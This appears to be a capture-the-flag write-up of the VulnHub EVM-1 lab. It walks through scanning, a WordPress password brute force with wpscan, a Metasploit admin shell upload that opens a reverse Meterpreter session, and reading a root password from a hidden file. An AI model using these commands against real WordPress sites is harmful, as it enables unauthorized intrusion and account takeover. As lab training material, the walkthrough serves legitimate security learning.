VulnHub: EVM-1


Initially, we must discover what IP the target received from the DHCP server. We can use netdiscover to identify the IP address. From there, we perform a full port scan to identify available services. There are many ports open, so I will start with port 80 HTTP.

$ netdiscover -r
$ nmap -p- -sV
Initial Enumeraiton

Enumerating HTTP

Apache landing page with hint

The home page is a default Apache landing page, although there is a hint on where we should go next, suggesting that that we look at /wordpress.

WordPress landing page

When viewed, we see a WordPress page setup, however notice that it is text only. Perhaps all the content has moved elsewhere. We can gather some small information, a potential username c0rrupt3d_brain. I say a potential username because we have not confirmed that it still exists, or that it has remained unchanged.

We can perform a gobuster scan to identify possible pages, and indeed find that the wordpress pages have a 301 redirect HTTP response.

$ gobuster dir \
    dir \ 
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
GoBuster scan

Instead, we can use wpscan to enumerate the wordpress service. Firstly, we enumerate the users. Following this, we can use wpscan to try and brute force the password.

$ wpscan --url --enumerate u
[i] User(s) Identified: 
[+] c0rrupt3d_brain

$ wpscan --url -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
[SUCCESS] - c0rrupt3d_brain / 24992499
Identifying users
Brute forcing password

Initial Shell

We’ll use the metasploit framework wp_admin_shell_upload module for this and open a meterpreter session relatively easily:

$ msfconsole
> use exploit/unix/webapp/wp_admin_shell_upload
> show options
> set rhosts
> set targeturi /wordpress
> set username c0rrupt3d_brain
> set password 24992499
> set lhost
> exploit
Using the Metasploit Framework to get an initial shell
id of initial shell

Escalating Privileges

To start, we’ll jump into a TTY shell, which we’ll need to upgrade. We can do this with the following commands:

$ python -c 'import pty; pty.spawn("/bin/bash");'
$ stty raw -echo
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color

From here, privielge escalation requires some enumeration. We should check the /home directory for some interesting files. In this case we discover a /root3d directory. Within this there is a hidden file which contains the root password. To switch to the root user, we issue the $ su command, and input the identified password. This provides the root shell!

Enumeration to get root
Escalating Privileges

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